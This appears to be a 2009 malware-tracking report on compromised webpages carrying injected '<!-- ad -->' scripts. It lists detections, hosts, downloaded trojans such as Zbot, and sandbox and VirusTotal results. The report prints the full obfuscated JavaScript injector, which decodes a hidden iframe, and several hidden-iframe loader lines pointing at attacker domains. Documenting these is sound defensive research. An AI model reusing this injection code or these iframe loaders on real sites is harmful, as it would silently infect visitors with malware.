| Malicious code inserted: | |
<!-- ad --> aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3 </script><!-- /ad --> | |
| Result: | |
| <iframe src='hxxp://85.17.139.[BLOCKED]193/lasthero1/?t=2' style='visibility:hidden' ></iframe> | |
| Detected on: | |
| February 12 by http://www.malwaredomainlist.com/mdl.php?sort=Date...... | |
| February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311 | |
| Virustotal Analysis on 2009.02.12 09:55:10 (CET): | |
| 2/39 (5.13%) | |
| Ikarus T3.1.1.45.0 2009.02.12 Exploit.Win32.Pdfjsc | |
| a-squared 4.0.0.93 2009.02.12 Exploit.Win32.Pdfjsc!IK | |
| Virustotal Analysis on 2009.02.12 09:59:40 (CET): | |
| Avast 4.8.1335.0 2009.02.11 Win32:Fabot | |
| eSafe 7.0.17.0 2009.02.11 Suspicious File | |
| Data 19 2009.02.12 Win32:Fabot | |
| Symantec 10 2009.02.12 Suspicious.MH690.A | |
| TrendMicro 8.700.0.1004 2009.02.12 PAK_Generic.001 | |
| http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99 | |
| Other Malicious code inserted: | |
<!-- ad --><script> aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0. | |
| Result: | |
| IFRAME is inserted into compromised webpages | |
| <iframe src='hxxp://truittbros.net/' style='visibility:hidden' > </iframe> <iframe src='hxxp://idealadvertising.org/clicksagent/?...' style='visibility:hidden' > </iframe> idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com) Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland) | |
| Payload detected by using the IP: | |
| 85.17.189.183/clicksagent/?h=17h 200 Found | |
| Result: | |
| MS-DOS executable PE for MS Windows | |
| Virustotal Analysis: | |
| File install.exe received on 02.19.2009 00:14:46 (CET) Result: 7/39 (17.95%) | |
| http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b | |
| File Size: 47,104 bytes | |
| ThreatExpert Analysis: | |
| http://www.threatexpert.com/report.aspx?md5=dadb6a147a831902e20 62666e045a418 http://www.threatexpert.com/threats/trojan-win32-internetantivirus.html | |
| Alias: | |
| Trojan.Win32.InternetAntivirus [Ikarus] | |
| Malicious code inserted: | |
| <!-- ad --> <script language="JavaScript"> function rkfg(jflq){ return String.fromCharCode(jflq); } var ohhe="060105102114097109101032115114099061039104116116112058 04704711511711210111410511111409710012204610511010211104711111 21051150470631160610490510390321191051001161040610390480390321 04101105103104116061039048039032115116121108101061039118105115 10509810510810511612105803210410510010010111005903906206004710 5102114097109101062"; var ifdm=""; for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ ifdm+=rkfg(ohhe.substr (qhxk, 3)); } window.status='Done'; document.write(ifdm); </script> <!-- /ad --> | |
| * random letter | |
| Same malicious code inserted: | |
| <script language="JavaScript"> function pwby(yyiu){ return String.fromCharCode(yyiu); } var trsl="060105102114097109101032115114099061039104116116112058 04704711511711210111410511111409710012204610511010211104711111 21051150470631160610490500390321191051001161040610390480390321 04101105103104116061039048039032115116121108101061039118105115 10509810510810511612105803210410510010010111005903906206004710 5102114097109101062"; var mpsq=""; for(hwrv=0;hwrv<trsl.length;hwrv+=3){ mpsq+=pwby(trsl.substr (hwrv, 3)); } window.status='Done'; document.write(mpsq); </script> | |
| Result: | |
| <iframe src='hxxp://superioradz.info/opis/?t=13' width='0' height='0' style='visibility: hidden;'> </iframe> | |
| Analysis: | |
| http://www.threatexpert.com/report.aspx?md5=95c04992bf14769fbd1b7b0ada9b9e87 | |
| HTTP Requests: | |
| hxxp://85.17.189.183/opis/?6e53cb91d272691ff1f03316b4e40fe897304252d0b05b1 c33d58155a3825e960ee3a527ad0f3b81a23df2c7d43150e96be9dca7a6e59d3f4d816 ff4a5122e8f | |
| hxxp://85.17.189.183/opis/?8fbe2b5fa4842f6f0fe51f024732e6b290ef4e487d3779dc2 d10d646083af5315a0c295b173c9074618dc04b42ade64ca0abd171ed2dcd203721fc9 bdd89aba3 | |
| text/html (JavaScript) | |
| Javascript Analysis: | |
| http://wepawet.iseclab.org/view.php?hash=ca172b3a2297a76af1183181cba4249a&t =1234983863&type=js | |
| Virustotal Analysis: VT: 1/39 (2.71%) | |
| http://www.virustotal.com/analisis/df3279de33cdf24699004ab05ef61d13 | |
| Alias: | |
| JS/Xilos [Microsoft] | |
| HTTP Requests: | |
| hxxp://85.17.189.183/opis/?35c0378e5af230cb06d1aef60e9d313999fb02e0230541 0fd4357d45f884bd55584e963ddeeb3e2010d55b1bc73920171042005b87c96f99cb 9b3820d28f4413 | |
| application/x-shockwave-flash (swf - Shockwave Flash File) | |
| Result: | |
| MS-DOS executable PE for MS Windows downloaded | |
| hxxp://85.17.189.183/opis/?h=17 | |
| File name: a.exe File Size: 8704 Bytes | |
| ThreatExpert Analysis: | |
| : | http://www.threatexpert.com/report.aspx?md5=8d82c411cb3748dfefcbd4277db7fbfd |
| Virustotal Analysis: | |
| File a.exe received on 02.18.2009 14:11:35 (CET) Result: 5/39 (12.82%) http://www.virustotal.com/analisis/a1bee09c6dd5cf3dbd890a4b777156b2 | |
| File a.exe received on 02.19.2009 00:14:46 (CET) Result: 7/39 (17.95%) http://www.virustotal.com/analisis/4e0e89411f8cfb49482553319d080e38 | |
| Alias: | |
| Suspicious.MH690 [Symantec] | |
| TrojanDownloader:Win32/Obitel.gen!A [Microsoft] | |
| http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99 | |
| Analysis: First infection: | |
| HTTP Requests: | |
| 85.17.143.203:80 - [banksguard.com] | |
| GET /pics/ncr.exe | |
| File name: ncr.exe | |
| File Size: 61952 Bytes | |
| Alias & packer info: | |
| Troj/Inject-EF [Sophos] | |
| Trojan.Win32.Zbot [Ikarus] | |
| packed with: PE_Patch [Kaspersky Lab] | |
| ThreatExport Analysis: | |
| http://www.threatexpert.com/report.aspx?md5=5d074816dc6625fcd8df4c8f7dce992b | |
| Iseclab Anubis Analysis: | |
| Ikarus Virus Scanner - Trojan.Win32.Zbot (Sig-Id:454183) | |
| http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5f33 8&format=html | |
| Virustotal Analysis: | |
| File ncr.exe received on 02.18.2009 20:05:49 (CET) Result: 11/39 (28.21%) http://www.virustotal.com/analisis/2bcb0d524cf1e0524997077667c93963 | |
| File ncr.exe received on 02.19.2009 11:55:07 (CET) Result: 14/39 (35.9%) http://www.virustotal.com/analisis/e1721fe1408999bfb71f97e749fa1b17 | |
| mcenspc.dll | |
| http://www.threatexpert.com/files/mcenspc.dll.html | |
| Analysis: After first infection: | |
| HTTP Activity: | |
| 85.17.143.203:80 - [banksguard.com] | |
| Request: POST /pics/receiver/online | |
| Anubis Iseclab Analysis: | |
| http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5 f338&format=html | |
| Detected on: | |
| February 12 by http://secuboxlabs.fr/ | |
| February 12 by http://www.malwaredomainlist.com/forums/index.php?topic=2550.0 | |
| February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311 | |
| February 15 by http://www.malwaredomainlist.com/mdl.php?search=superioradz.info | |
| The domain superioradz.info has suddenly disapeared (ns lookup failed)and the folder has been deleted/renamed. | |
| Other Malicious code inserted: | |
<!-- ad --> aaa=(((0x17,4.471e3),(3e0>8?0.93:23.)),((.1<0x738?6407:.87),(35.<= </script><!-- /ad --> | |
| Result: | |
| IFRAME is inserted into compromised webpages | |
| <iframe src='hxxp://idealadvertising.org/clicksagent/?t=2' style='visibility:hidden' ></iframe> <iframe src='hxxp://idealadvertising.org/clicksagent/?...' style='visibility:hidden' > </iframe> idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com) Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland) | |
| JavaScript Analysis: | |
| http://wepawet.iseclab.org/view.php?hash=45d3... | |
| JS Obfuscated Code: | |
| hxxp://idealadvertising.org/clicksagent/?t=2 | |
| hxxp://idealadvertising.org/clicksagent/?075c..... | |
| hxxp://idealadvertising.org/clicksagent/?6cb..... | |
| Network Activity: | |
| 81.2.253.206:80 - [www.sprinterkiado.hu] | |
| Request: GET /index.php?session_id=57972&user_id=0&screen=8 | |
| 195.70.32.221:80 - [c.hu.tipptop.com] | |
| Request: GET /cgi-bin/?id=3608&c=LPmcnYzL&h=1 | |
| 85.17.189.183:80 - [idealadvertising.org] | |
| Request: GET /clicksagent/?t=2 | |
| Result: MS-DOS executablePE for MS Windows: | |
| hxxp://85.17.189.183/clicksagent/?h=17h File name: ncr.exe File Size: 8704 Bytes | |
| Iseclab Anubis Analysis: | |
| http://anubis.iseclab.org/?action=result&task_id=12d602... | |
| VirusTotal Results: 7/39 (17.95%): | |
| http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b | |
| Analysed on 02.19.2009 00:14:46 | |
| Alias: | |
| http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99&tabid=2 | |
| Suspicious.MH690.A [Symantec] | |
Active attacks: LATEST ADDITIONS